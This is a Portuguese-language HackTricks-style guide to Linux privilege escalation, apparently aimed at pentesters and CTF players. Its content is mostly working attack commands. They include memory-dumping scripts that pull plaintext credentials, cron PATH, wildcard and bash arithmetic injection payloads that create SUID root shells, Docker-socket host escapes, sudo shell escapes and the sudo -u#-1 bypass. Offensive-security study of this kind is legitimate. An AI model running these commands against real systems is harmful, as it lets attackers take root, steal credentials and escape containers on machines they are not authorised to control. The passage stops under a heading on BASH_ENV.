Linux Privilege Escalation

Reading time: 64 minutes

tip

Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Aprenda e pratique Hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporte o HackTricks

Informações do Sistema

Informações do OS

Vamos começar a obter informações sobre o SO em execução

bash
(cat /proc/version || uname -a ) 2>/dev/null
lsb_release -a 2>/dev/null # old, not by default on many systems
cat /etc/os-release 2>/dev/null # universal on modern systems

Path

Se você tem permissão de escrita em qualquer pasta dentro da variável PATH, pode ser capaz de sequestrar algumas bibliotecas ou binários:

bash
echo $PATH

Informações do ambiente

Informações interessantes, senhas ou chaves de API nas variáveis de ambiente?

bash
(env || set) 2>/dev/null

Kernel exploits

Verifique a versão do kernel e se existe algum exploit que possa ser usado para escalate privileges

bash
cat /proc/version
uname -a
searchsploit "Linux Kernel"

Você pode encontrar uma boa lista de kernels vulneráveis e alguns compiled exploits aqui: https://github.com/lucyoa/kernel-exploits and exploitdb sploits.
Outros sites onde você pode encontrar alguns compiled exploits: https://github.com/bwbwbwbw/linux-exploit-binaries, https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack

Para extrair todas as versões de kernel vulneráveis desse site você pode fazer:

bash
curl https://raw.githubusercontent.com/lucyoa/kernel-exploits/master/README.md 2>/dev/null | grep "Kernels: " | cut -d ":" -f 2 | cut -d "<" -f 1 | tr -d "," | tr ' ' '\n' | grep -v "^\d\.\d$" | sort -u -r | tr '\n' ' '

Ferramentas que podem ajudar a procurar por kernel exploits são:

linux-exploit-suggester.sh
linux-exploit-suggester2.pl
linuxprivchecker.py (executar IN victim, apenas verifica exploits para kernel 2.x)

Sempre pesquise a kernel version no Google, talvez a sua kernel version esteja escrita em algum kernel exploit e assim você terá certeza de que esse exploit é válido.

CVE-2016-5195 (DirtyCow)

Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8

bash
# make dirtycow stable
echo 0 > /proc/sys/vm/dirty_writeback_centisecs
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs
https://github.com/evait-security/ClickNRoot/blob/master/1/exploit.c

Versão do sudo

Com base nas versões vulneráveis do sudo que aparecem em:

bash
searchsploit sudo

Você pode verificar se a versão do sudo é vulnerável usando este grep.

bash
sudo -V | grep "Sudo ver" | grep "1\.[01234567]\.[0-9]\+\|1\.8\.1[0-9]\*\|1\.8\.2[01234567]"

sudo < v1.8.28

De @sickrov

sudo -u#-1 /bin/bash

Dmesg falha na verificação de assinatura

Verifique smasher2 box of HTB para um exemplo de como esta vuln poderia ser explorada

bash
dmesg 2>/dev/null | grep "signature"

Mais enumeração do sistema

bash
date 2>/dev/null #Date
(df -h || lsblk) #System stats
lscpu #CPU info
lpstat -a 2>/dev/null #Printers info

Enumerar possíveis defesas

AppArmor

bash
if [ `which aa-status 2>/dev/null` ]; then
aa-status
elif [ `which apparmor_status 2>/dev/null` ]; then
apparmor_status
elif [ `ls -d /etc/apparmor* 2>/dev/null` ]; then
ls -d /etc/apparmor*
else
echo "Not found AppArmor"
fi

Grsecurity

bash
((uname -r | grep "\-grsec" >/dev/null 2>&1 || grep "grsecurity" /etc/sysctl.conf >/dev/null 2>&1) && echo "Yes" || echo "Not found grsecurity")

PaX

bash
(which paxctl-ng paxctl >/dev/null 2>&1 && echo "Yes" || echo "Not found PaX")

Execshield

bash
(grep "exec-shield" /etc/sysctl.conf || echo "Not found Execshield")

SElinux

bash
(sestatus 2>/dev/null || echo "Not found sestatus")

ASLR

bash
cat /proc/sys/kernel/randomize_va_space 2>/dev/null
#If 0, not enabled

Docker Breakout

Se você estiver dentro de um docker container pode tentar escapar dele:

Docker Security

Drives

Verifique o que está montado e desmontado, onde e por quê. Se algo estiver desmontado, você pode tentar montá-lo e verificar por informações privadas

bash
ls /dev 2>/dev/null | grep -i "sd"
cat /etc/fstab 2>/dev/null | grep -v "^#" | grep -Pv "\W*\#" 2>/dev/null
#Check if credentials in fstab
grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null

Software útil

Enumere binários úteis

bash
which nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch docker lxc ctr runc rkt kubectl 2>/dev/null

Além disso, verifique se algum compilador está instalado. Isso é útil se você precisar usar algum kernel exploit, pois é recomendado compilá-lo na máquina onde você vai usá-lo (ou em uma similar)

bash
(dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; which gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$" 2>/dev/null | grep -v "/doc/")

Software vulnerável instalado

Verifique a versão dos pacotes e serviços instalados. Talvez haja alguma versão antiga do Nagios (por exemplo) que poderia ser explorada para escalating privileges…
Recomenda-se verificar manualmente a versão do software instalado que pareça mais suspeito.

bash
dpkg -l #Debian
rpm -qa #Centos

Se você tiver acesso SSH à máquina, você também pode usar openVAS para verificar software desatualizado e vulnerável instalado dentro da máquina.

[!NOTE] > Observe que esses comandos mostrarão muita informação que, em sua maior parte, será inútil; portanto, recomenda-se usar aplicações como OpenVAS ou similares que verificarão se alguma versão de software instalada é vulnerável a exploits conhecidos

Processos

Dê uma olhada em quais processos estão sendo executados e verifique se algum processo tem mais privilégios do que deveria (talvez um tomcat sendo executado como root?)

bash
ps aux
ps -ef
top -n 1

Sempre verifique possíveis electron/cef/chromium debuggers running, you could abuse it to escalate privileges. Linpeas detecta esses verificando o parâmetro --inspect na linha de comando do processo.
Também verifique seus privilégios sobre os binários dos processos, talvez você consiga sobrescrever algum.

Monitoramento de processos

Você pode usar ferramentas como pspy para monitorar processos. Isso pode ser muito útil para identificar processos vulneráveis executados com frequência ou quando um conjunto de requisitos é atendido.

Memória de processos

Alguns serviços de um servidor salvam credenciais em texto claro na memória.
Normalmente você precisará de privilégios root para ler a memória de processos que pertencem a outros usuários; portanto, isso geralmente é mais útil quando você já é root e deseja descobrir mais credenciais.
No entanto, lembre-se de que como usuário comum você pode ler a memória dos processos que possui.

warning

Note that nowadays most machines não permitem ptrace por padrão, o que significa que você não pode despejar outros processos que pertencem ao seu usuário sem privilégios.

The file /proc/sys/kernel/yama/ptrace_scope controls the accessibility of ptrace:

  • kernel.yama.ptrace_scope = 0: todos os processos podem ser depurados, desde que tenham o mesmo uid. Esta é a forma clássica de funcionamento do ptrace.
  • kernel.yama.ptrace_scope = 1: apenas um processo pai pode ser depurado.
  • kernel.yama.ptrace_scope = 2: somente o administrador pode usar ptrace, pois requer a capability CAP_SYS_PTRACE.
  • kernel.yama.ptrace_scope = 3: nenhum processo pode ser rastreado com ptrace. Uma vez definido, é necessário reiniciar para habilitar ptrace novamente.

GDB

Se você tiver acesso à memória de um serviço FTP (por exemplo), você pode obter o Heap e procurar dentro dele por credenciais.

bash
gdb -p <FTP_PROCESS_PID>
(gdb) info proc mappings
(gdb) q
(gdb) dump memory /tmp/mem_ftp <START_HEAD> <END_HEAD>
(gdb) q
strings /tmp/mem_ftp #User and password

GDB Script

dump-memory.sh
#!/bin/bash
#./dump-memory.sh <PID>
grep rw-p /proc/$1/maps \
| sed -n 's/^\([0-9a-f]*\)-\([0-9a-f]*\) .*$/\1 \2/p' \
| while read start stop; do \
gdb --batch --pid $1 -ex \
"dump memory $1-$start-$stop.dump 0x$start 0x$stop"; \
done

/proc/$pid/maps & /proc/$pid/mem

Para um dado ID de processo, maps mostram como a memória está mapeada no espaço de endereçamento virtual desse processo; também mostra as permissões de cada região mapeada. O pseudo-arquivo mem expõe a própria memória do processo. A partir do arquivo maps sabemos quais regiões de memória são legíveis e seus offsets. Usamos essa informação para seek into the mem file and dump all readable regions to a file.

bash
procdump()
(
cat /proc/$1/maps | grep -Fv ".so" | grep " 0 " | awk '{print $1}' | ( IFS="-"
while read a b; do
dd if=/proc/$1/mem bs=$( getconf PAGESIZE ) iflag=skip_bytes,count_bytes \
skip=$(( 0x$a )) count=$(( 0x$b - 0x$a )) of="$1_mem_$a.bin"
done )
cat $1*.bin > $1.dump
rm $1*.bin
)

/dev/mem

/dev/mem fornece acesso à memória física do sistema, não à memória virtual. O espaço de endereçamento virtual do kernel pode ser acessado usando /dev/kmem.
Normalmente, /dev/mem só é legível por root e pelo grupo kmem.

strings /dev/mem -n10 | grep -i PASS

ProcDump para linux

ProcDump é uma releitura para Linux da clássica ferramenta ProcDump do conjunto Sysinternals para Windows. Disponível em https://github.com/Sysinternals/ProcDump-for-Linux

procdump -p 1714

ProcDump v1.2 - Sysinternals process dump utility
Copyright (C) 2020 Microsoft Corporation. All rights reserved. Licensed under the MIT license.
Mark Russinovich, Mario Hewardt, John Salem, Javid Habibi
Monitors a process and writes a dump file when the process meets the
specified criteria.

Process:		sleep (1714)
CPU Threshold:		n/a
Commit Threshold:	n/a
Thread Threshold:		n/a
File descriptor Threshold:		n/a
Signal:		n/a
Polling interval (ms):	1000
Threshold (s):	10
Number of Dumps:	1
Output directory for core dumps:	.

Press Ctrl-C to end monitoring without terminating the process.

[20:20:58 - WARN]: Procdump not running with elevated credentials. If your uid does not match the uid of the target process procdump will not be able to capture memory dumps
[20:20:58 - INFO]: Timed:
[20:21:00 - INFO]: Core dump 0 generated: ./sleep_time_2021-11-03_20:20:58.1714

Ferramentas

Para fazer dump da memória de um processo você pode usar:

Credenciais a partir da memória do processo

Exemplo manual

Se você descobrir que o processo authenticator está em execução:

bash
ps -ef | grep "authenticator"
root      2027  2025  0 11:46 ?        00:00:00 authenticator

Você pode despejar o processo (veja as seções anteriores para encontrar diferentes maneiras de despejar a memória de um processo) e procurar por credenciais dentro da memória:

bash
./dump-memory.sh 2027
strings *.dump | grep -i password

mimipenguin

A ferramenta https://github.com/huntergregal/mimipenguin irá roubar credenciais em texto claro da memória e de alguns arquivos bem conhecidos. Requer privilégios de root para funcionar corretamente.

FuncionalidadeNome do Processo
GDM password (Kali Desktop, Debian Desktop)gdm-password
Gnome Keyring (Ubuntu Desktop, ArchLinux Desktop)gnome-keyring-daemon
LightDM (Ubuntu Desktop)lightdm
VSFTPd (Active FTP Connections)vsftpd
Apache2 (Active HTTP Basic Auth Sessions)apache2
OpenSSH (Active SSH Sessions - Sudo Usage)sshd:

Expressões Regulares de Busca/truffleproc

bash
# un truffleproc.sh against your current Bash shell (e.g. $$)
./truffleproc.sh $$
# coredumping pid 6174
Reading symbols from od...
Reading symbols from /usr/lib/systemd/systemd...
Reading symbols from /lib/systemd/libsystemd-shared-247.so...
Reading symbols from /lib/x86_64-linux-gnu/librt.so.1...
[...]
# extracting strings to /tmp/tmp.o6HV0Pl3fe
# finding secrets
# results in /tmp/tmp.o6HV0Pl3fe/results.txt

Tarefas Agendadas/Cron jobs

Crontab UI (alseambusher) em execução como root – web-based scheduler privesc

Se um painel web “Crontab UI” (alseambusher/crontab-ui) estiver em execução como root e estiver ligado apenas ao loopback, você ainda pode alcançá‑lo via SSH local port-forwarding e criar uma tarefa privilegiada para escalar.

Cadeia típica

  • Descobrir porta apenas em loopback (e.g., 127.0.0.1:8000) e Basic-Auth realm via ss -ntlp / curl -v localhost:8000
  • Encontrar credenciais em artefatos operacionais:
  • Backups/scripts com zip -P <password>
  • systemd unit expondo Environment="BASIC_AUTH_USER=...", Environment="BASIC_AUTH_PWD=..."
  • Tunnel and login:
bash
ssh -L 9001:localhost:8000 user@target
# browse http://localhost:9001 and authenticate
  • Crie um job com privilégios elevados e execute imediatamente (gera um shell SUID):
bash
# Name: escalate
# Command:
cp /bin/bash /tmp/rootshell && chmod 6777 /tmp/rootshell
  • Use-o:
bash
/tmp/rootshell -p   # root shell

Endurecimento

  • Do not run Crontab UI as root; restrinja com um usuário dedicado e permissões mínimas
  • Bind to localhost and additionally restrict access via firewall/VPN; do not reuse passwords
  • Avoid embedding secrets in unit files; use secret stores or root-only EnvironmentFile
  • Enable audit/logging for on-demand job executions

Verifique se alguma tarefa agendada está vulnerável. Talvez você possa aproveitar um script sendo executado pelo root (wildcard vuln? can modify files that root uses? use symlinks? create specific files in the directory that root uses?).

bash
crontab -l
ls -al /etc/cron* /etc/at*
cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/root 2>/dev/null | grep -v "^#"

PATH do Cron

Por exemplo, dentro de /etc/crontab você pode encontrar o PATH: PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

(Repare como o usuário "user" tem privilégios de escrita sobre /home/user)

Se dentro deste crontab o usuário root tentar executar algum comando ou script sem definir o PATH. Por exemplo: * * * * root overwrite.sh. Então, você pode obter um shell root usando:

bash
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh
#Wait cron job to be executed
/tmp/bash -p #The effective uid and gid to be set to the real uid and gid

Cron usando um script com um wildcard (Wildcard Injection)

Se um script executado por root contiver um “*” dentro de um comando, você pode explorar isso para fazer coisas inesperadas (como privesc). Exemplo:

bash
rsync -a *.sh rsync://host.back/src/rbd #You can create a file called "-e sh myscript.sh" so the script will execute our script

Se o wildcard for precedido por um caminho como /some/path/* , não é vulnerável (até mesmo ./* não é).

Leia a página a seguir para mais truques de exploração de wildcard:

Wildcards Spare tricks

Bash arithmetic expansion injection in cron log parsers

Bash performs parameter expansion and command substitution before arithmetic evaluation in ((...)), $((...)) and let. Se um cron/parser executado como root lê campos de log não confiáveis e os envia para um contexto aritmético, um atacante pode injetar uma command substitution $(...) que será executada como root quando o cron rodar.

  • Por que funciona: No Bash, as expansões ocorrem nesta ordem: parameter/variable expansion, command substitution, arithmetic expansion, depois word splitting e pathname expansion. Assim, um valor como $(/bin/bash -c 'id > /tmp/pwn')0 é primeiro substituído (executando o comando), então o restante numérico 0 é usado na aritmética para que o script continue sem erros.

  • Padrão tipicamente vulnerável:

bash
#!/bin/bash
# Example: parse a log and "sum" a count field coming from the log
while IFS=',' read -r ts user count rest; do
# count is untrusted if the log is attacker-controlled
(( total += count ))     # or: let "n=$count"
done < /var/www/app/log/application.log
  • Exploração: Faça com que texto controlado pelo atacante seja escrito no log analisado, de modo que o campo que parece numérico contenha uma command substitution e termine com um dígito. Garanta que seu comando não imprima para stdout (ou redirecione) para que a aritmética permaneça válida.
bash
# Injected field value inside the log (e.g., via a crafted HTTP request that the app logs verbatim):
$(/bin/bash -c 'cp /bin/bash /tmp/sh; chmod +s /tmp/sh')0
# When the root cron parser evaluates (( total += count )), your command runs as root.

If you can modify a cron script executed by root, you can get a shell very easily:

bash
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > </PATH/CRON/SCRIPT>
#Wait until it is executed
/tmp/bash -p

Se o script executado por root usa um diretório ao qual você tem acesso total, talvez seja útil deletar essa pasta e criar uma pasta symlink apontando para outra que sirva um script controlado por você

bash
ln -d -s </PATH/TO/POINT> </PATH/CREATE/FOLDER>

Cron jobs frequentes

Você pode monitorar os processos para buscar aqueles que estão sendo executados a cada 1, 2 ou 5 minutos. Talvez você possa tirar proveito disso e elevar privilégios.

Por exemplo, para monitorar a cada 0.1s durante 1 minuto, ordenar pelos comandos menos executados e remover os comandos que foram executados com mais frequência, você pode fazer:

bash
for i in $(seq 1 610); do ps -e --format cmd >> /tmp/monprocs.tmp; sleep 0.1; done; sort /tmp/monprocs.tmp | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort | grep -E -v "\s*[6-9][0-9][0-9]|\s*[0-9][0-9][0-9][0-9]"; rm /tmp/monprocs.tmp;

Você também pode usar pspy (isso vai monitorar e listar todos os processos que iniciarem).

Cron jobs invisíveis

É possível criar um cronjob colocando um carriage return após um comentário (sem o caractere de newline), e o cron job funcionará. Exemplo (observe o caractere carriage return):

bash
#This is a comment inside a cron config file\r* * * * * echo "Surprise!"

Serviços

Arquivos .service com permissão de escrita

Verifique se você consegue gravar qualquer arquivo .service, se conseguir, você poderia modificá-lo de forma que ele execute seu backdoor quando o serviço for iniciado, reiniciado ou parado (talvez você precise esperar até que a máquina seja reiniciada).
Por exemplo, crie seu backdoor dentro do arquivo .service com ExecStart=/tmp/script.sh

Binários de serviço com permissão de escrita

Tenha em mente que, se você tem permissões de escrita sobre os binários executados por serviços, pode alterá-los para backdoors, de forma que quando os serviços forem re-executados os backdoors sejam executados.

systemd PATH - Caminhos relativos

Você pode ver o PATH usado pelo systemd com:

bash
systemctl show-environment

Se você descobrir que pode escrever em qualquer uma das pastas do caminho, pode ser capaz de escalar privilégios. Você precisa procurar por caminhos relativos sendo usados em arquivos de configuração de serviços como:

bash
ExecStart=faraday-server
ExecStart=/bin/sh -ec 'ifup --allow=hotplug %I; ifquery --state %I'
ExecStop=/bin/sh "uptux-vuln-bin3 -stuff -hello"

Então, crie um executável com o mesmo nome do binário do caminho relativo dentro do diretório PATH do systemd que você possa escrever, e quando o serviço for solicitado a executar a ação vulnerável (Start, Stop, Reload), seu backdoor será executado (usuários sem privilégios normalmente não podem iniciar/parar serviços, mas verifique se você pode usar sudo -l).

Saiba mais sobre serviços com man systemd.service.

Temporizadores

Temporizadores são arquivos de unidade do systemd cujo nome termina em **.timer** que controlam arquivos ou eventos **.service**. Temporizadores podem ser usados como uma alternativa ao cron, pois têm suporte embutido para eventos em tempo de calendário e eventos em tempo monotônico, e podem ser executados assincronamente.

Você pode enumerar todos os temporizadores com:

bash
systemctl list-timers --all

Temporizadores graváveis

Se você puder modificar um timer, pode fazê-lo executar algumas unidades existentes do systemd.unit (como um .service ou um .target)

bash
Unit=backdoor.service

In the documentation you can read what the Unit is:

A unidade a ativar quando este timer expirar. O argumento é um nome de unidade, cujo sufixo não é ".timer". Se não for especificado, este valor padrão é um service que tem o mesmo nome da unidade timer, excepto pelo sufixo. (See above.) Recomenda-se que o nome da unidade que é ativado e o nome da unidade do timer sejam nomeados identicamente, excepto pelo sufixo.

Therefore, to abuse this permission you would need to:

  • Encontrar alguma unidade systemd (como um .service) que esteja executando um binário gravável
  • Encontrar alguma unidade systemd que esteja executando um caminho relativo e sobre a qual você tenha privilégios de escrita no systemd PATH (para se passar por esse executável)

Learn more about timers with man systemd.timer.

Enabling Timer

To enable a timer you need root privileges and to execute:

bash
sudo systemctl enable backu2.timer
Created symlink /etc/systemd/system/multi-user.target.wants/backu2.timer → /lib/systemd/system/backu2.timer.

Note que o timer é ativado ao criar um symlink para ele em /etc/systemd/system/<WantedBy_section>.wants/<name>.timer

Sockets

Unix Domain Sockets (UDS) permitem a comunicação entre processos na mesma máquina ou em máquinas diferentes dentro de modelos cliente-servidor. Eles utilizam arquivos de descritor Unix padrão para comunicação entre computadores e são configurados através de arquivos .socket.

Sockets podem ser configurados usando arquivos .socket.

Saiba mais sobre sockets com man systemd.socket. Dentro deste arquivo, vários parâmetros interessantes podem ser configurados:

  • ListenStream, ListenDatagram, ListenSequentialPacket, ListenFIFO, ListenSpecial, ListenNetlink, ListenMessageQueue, ListenUSBFunction: Estas opções são diferentes, mas um resumo é usado para indicar onde ele irá escutar o socket (o caminho do arquivo de socket AF_UNIX, o IPv4/6 e/ou número da porta a escutar, etc.)
  • Accept: Recebe um argumento booleano. Se true, uma instância de serviço é gerada para cada conexão recebida e somente o socket da conexão é passado para ela. Se false, todos os sockets de escuta são passados para a unidade de service iniciada, e apenas uma unidade de service é gerada para todas as conexões. Este valor é ignorado para datagram sockets e FIFOs, onde uma única unidade de service lida incondicionalmente com todo o tráfego de entrada. Padrão: false. Por questões de desempenho, recomenda-se escrever novos daemons apenas de forma adequada para Accept=no.
  • ExecStartPre, ExecStartPost: Aceita uma ou mais linhas de comando, que são executadas antes ou depois dos sockets/FIFOs de escuta serem criadas e vinculadas, respectivamente. O primeiro token da linha de comando deve ser um nome de arquivo absoluto, seguido pelos argumentos do processo.
  • ExecStopPre, ExecStopPost: Comandos adicionais que são executados antes ou depois dos sockets/FIFOs de escuta serem fechados e removidos, respectivamente.
  • Service: Especifica o nome da unidade de service a ativar no tráfego de entrada. Esta configuração só é permitida para sockets com Accept=no. Por padrão, aponta para o service que tem o mesmo nome que o socket (com o sufixo substituído). Na maioria dos casos, não deve ser necessário usar esta opção.

Arquivos .socket graváveis

Se você encontrar um arquivo .socket gravável você pode adicionar no início da seção [Socket] algo como: ExecStartPre=/home/kali/sys/backdoor e o backdoor será executado antes do socket ser criado. Portanto, você provavelmente precisará esperar até que a máquina seja reiniciada.
Observe que o sistema deve estar usando essa configuração de arquivo socket ou o backdoor não será executado

Sockets graváveis

Se você identificar algum socket gravável (agora estamos falando de Unix Sockets e não dos arquivos de configuração .socket), então você pode se comunicar com esse socket e talvez explorar uma vulnerabilidade.

Enumerar Unix Sockets

bash
netstat -a -p --unix

Conexão raw

bash
#apt-get install netcat-openbsd
nc -U /tmp/socket  #Connect to UNIX-domain stream socket
nc -uU /tmp/socket #Connect to UNIX-domain datagram socket

#apt-get install socat
socat - UNIX-CLIENT:/dev/socket #connect to UNIX-domain socket, irrespective of its type

Exemplo de exploração:

Socket Command Injection

HTTP sockets

Observe que pode haver alguns sockets listening for HTTP requests (não estou falando sobre arquivos .socket mas sobre os arquivos que atuam como unix sockets). Você pode verificar isso com:

bash
curl --max-time 2 --unix-socket /pat/to/socket/files http:/index

Se o socket responder com uma requisição HTTP, então você pode comunicar-se com ele e talvez explorar alguma vulnerabilidade.

Docker socket gravável

O Docker socket, frequentemente encontrado em /var/run/docker.sock, é um arquivo crítico que deve ser protegido. Por padrão, ele é gravável pelo usuário root e pelos membros do grupo docker. Possuir acesso de escrita a esse socket pode levar a privilege escalation. Abaixo está um resumo de como isso pode ser feito e métodos alternativos caso o Docker CLI não esteja disponível.

Privilege Escalation with Docker CLI

Se você tem acesso de escrita ao Docker socket, você pode realizar privilege escalation usando os seguintes comandos:

bash
docker -H unix:///var/run/docker.sock run -v /:/host -it ubuntu chroot /host /bin/bash
docker -H unix:///var/run/docker.sock run -it --privileged --pid=host debian nsenter -t 1 -m -u -n -i sh

Esses comandos permitem executar um container com acesso root ao sistema de arquivos do host.

Usando a API do Docker Diretamente

Quando o Docker CLI não estiver disponível, o socket do Docker ainda pode ser manipulado usando a Docker API e comandos curl.

  1. List Docker Images: Recupere a lista de imagens disponíveis.
bash
curl -XGET --unix-socket /var/run/docker.sock http://localhost/images/json
  1. Create a Container: Envie uma requisição para criar um container que monte o diretório raiz do sistema host.
bash
curl -XPOST -H "Content-Type: application/json" --unix-socket /var/run/docker.sock -d '{"Image":"<ImageID>","Cmd":["/bin/sh"],"DetachKeys":"Ctrl-p,Ctrl-q","OpenStdin":true,"Mounts":[{"Type":"bind","Source":"/","Target":"/host_root"}]}' http://localhost/containers/create

Inicie o container recém-criado:

bash
curl -XPOST --unix-socket /var/run/docker.sock http://localhost/containers/<NewContainerID>/start
  1. Attach to the Container: Use socat para estabelecer uma conexão com o container, permitindo a execução de comandos dentro dele.
bash
socat - UNIX-CONNECT:/var/run/docker.sock
POST /containers/<NewContainerID>/attach?stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1
Host:
Connection: Upgrade
Upgrade: tcp

Depois de estabelecer a conexão socat, você pode executar comandos diretamente no container com acesso root ao sistema de arquivos do host.

Others

Observe que se você tem permissões de escrita sobre o docker socket porque está inside the group docker você tem more ways to escalate privileges. If the docker API is listening in a port you can also be able to compromise it.

Check more ways to break out from docker or abuse it to escalate privileges in:

Docker Security

Containerd (ctr) privilege escalation

Se você descobrir que pode usar o comando ctr, leia a página a seguir, pois you may be able to abuse it to escalate privileges:

Containerd (ctr) Privilege Escalation

RunC privilege escalation

Se você descobrir que pode usar o comando runc, leia a página a seguir, pois you may be able to abuse it to escalate privileges:

RunC Privilege Escalation

D-Bus

D-Bus é um sofisticado sistema de inter-Process Communication (IPC) que permite que aplicações interajam e compartilhem dados de forma eficiente. Projetado para o sistema Linux moderno, oferece um framework robusto para diferentes formas de comunicação entre aplicações.

O sistema é versátil, suportando IPC básico que melhora a troca de dados entre processos, semelhante a UNIX domain sockets aprimorados. Além disso, auxilia na transmissão de eventos ou sinais, promovendo integração entre componentes do sistema. Por exemplo, um sinal de um daemon de Bluetooth sobre uma chamada recebida pode fazer com que um player de música silencie, melhorando a experiência do usuário. Adicionalmente, o D-Bus suporta um sistema de objetos remotos, simplificando pedidos de serviço e invocações de métodos entre aplicações, racionalizando processos que tradicionalmente eram complexos.

O D-Bus opera em um modelo de allow/deny, gerenciando permissões de mensagens (chamadas de método, emissões de sinal, etc.) com base no efeito cumulativo de regras de política que correspondem. Essas políticas especificam interações com o bus, podendo potencialmente permitir privilege escalation através da exploração dessas permissões.

Um exemplo de tal política em /etc/dbus-1/system.d/wpa_supplicant.conf é fornecido, detalhando permissões para o usuário root ter ownership, enviar e receber mensagens de fi.w1.wpa_supplicant1.

Políticas sem um usuário ou grupo especificado se aplicam universalmente, enquanto políticas de contexto "default" se aplicam a todos não cobertos por outras políticas específicas.

xml
<policy user="root">
<allow own="fi.w1.wpa_supplicant1"/>
<allow send_destination="fi.w1.wpa_supplicant1"/>
<allow send_interface="fi.w1.wpa_supplicant1"/>
<allow receive_sender="fi.w1.wpa_supplicant1" receive_type="signal"/>
</policy>

Aprenda como enumerar e explorar uma comunicação D-Bus aqui:

D-Bus Enumeration & Command Injection Privilege Escalation

Rede

Sempre é interessante enumerar a rede e descobrir a posição da máquina.

Enumeração genérica

bash
#Hostname, hosts and DNS
cat /etc/hostname /etc/hosts /etc/resolv.conf
dnsdomainname

#Content of /etc/inetd.conf & /etc/xinetd.conf
cat /etc/inetd.conf /etc/xinetd.conf

#Interfaces
cat /etc/networks
(ifconfig || ip a)

#Neighbours
(arp -e || arp -a)
(route || ip n)

#Iptables rules
(timeout 1 iptables -L 2>/dev/null; cat /etc/iptables/* | grep -v "^#" | grep -Pv "\W*\#" 2>/dev/null)

#Files used by network services
lsof -i

Open ports

Sempre verifique os network services em execução na máquina com os quais você não conseguiu interagir antes de acessá-la:

bash
(netstat -punta || ss --ntpu)
(netstat -punta || ss --ntpu) | grep "127.0"

Sniffing

Verifique se consegue sniff traffic. Se conseguir, pode capturar algumas credenciais.

timeout 1 tcpdump

Usuários

Enumeração Genérica

Verifique quem você é, quais privileges você tem, quais users estão nos sistemas, quais podem fazer login e quais têm root privileges:

bash
#Info about me
id || (whoami && groups) 2>/dev/null
#List all users
cat /etc/passwd | cut -d: -f1
#List users with console
cat /etc/passwd | grep "sh$"
#List superusers
awk -F: '($3 == "0") {print}' /etc/passwd
#Currently logged users
w
#Login history
last | tail
#Last log of each user
lastlog

#List all users and their groups
for i in $(cut -d":" -f1 /etc/passwd 2>/dev/null);do id $i;done 2>/dev/null | sort
#Current user PGP keys
gpg --list-keys 2>/dev/null

Big UID

Algumas versões do Linux foram afetadas por um bug que permite que usuários com UID > INT_MAX escalem privilégios. Mais informações: here, here and here.
Explorar usando: systemd-run -t /bin/bash

Grupos

Verifique se você é membro de algum grupo que poderia conceder-lhe privilégios de root:

Interesting Groups - Linux Privesc

Área de Transferência

Verifique se há algo interessante na área de transferência (se possível)

bash
if [ `which xclip 2>/dev/null` ]; then
echo "Clipboard: "`xclip -o -selection clipboard 2>/dev/null`
echo "Highlighted text: "`xclip -o 2>/dev/null`
elif [ `which xsel 2>/dev/null` ]; then
echo "Clipboard: "`xsel -ob 2>/dev/null`
echo "Highlighted text: "`xsel -o 2>/dev/null`
else echo "Not found xsel and xclip"
fi

Política de Senhas

bash
grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs

Senhas conhecidas

Se você souber alguma senha do ambiente, tente efetuar login como cada usuário usando essa senha.

Su Brute

Se você não se importar em gerar muito ruído e os binários su e timeout estiverem presentes na máquina, você pode tentar brute-force em usuários usando su-bruteforce.
Linpeas com o parâmetro -a também tenta brute-force em usuários.

Abusos de $PATH gravável

$PATH

Se você descobrir que pode escrever dentro de alguma pasta do $PATH, pode conseguir escalar privilégios criando um backdoor dentro da pasta gravável com o nome de algum comando que será executado por outro usuário (idealmente root) e que não seja carregado a partir de uma pasta que esteja antes da sua pasta gravável no $PATH.

SUDO and SUID

Você pode ter permissão para executar alguns comandos usando sudo ou eles podem ter o bit suid. Verifique usando:

bash
sudo -l #Check commands you can execute with sudo
find / -perm -4000 2>/dev/null #Find all SUID binaries

Alguns comandos inesperados permitem que você leia e/ou escreva arquivos ou até mesmo execute um comando. Por exemplo:

bash
sudo awk 'BEGIN {system("/bin/sh")}'
sudo find /etc -exec sh -i \;
sudo tcpdump -n -i lo -G1 -w /dev/null -z ./runme.sh
sudo tar c a.tar -I ./runme.sh a
ftp>!/bin/sh
less>! <shell_comand>

NOPASSWD

A configuração do sudo pode permitir que um usuário execute algum comando com os privilégios de outro usuário sem conhecer a senha.

$ sudo -l
User demo may run the following commands on crashlab:
(root) NOPASSWD: /usr/bin/vim

Neste exemplo, o usuário demo pode executar vim como root; agora é trivial obter um shell adicionando uma chave ssh no diretório root ou chamando sh.

sudo vim -c '!sh'

SETENV

Esta diretiva permite ao usuário definir uma variável de ambiente ao executar algo:

bash
$ sudo -l
User waldo may run the following commands on admirer:
(ALL) SETENV: /opt/scripts/admin_tasks.sh

Este exemplo, baseado na máquina HTB Admirer, estava vulnerável a PYTHONPATH hijacking para carregar uma biblioteca python arbitrária ao executar o script como root:

bash
sudo PYTHONPATH=/dev/shm/ /opt/scripts/admin_tasks.sh

BASH_ENV preservado via sudo env_keep → shell root

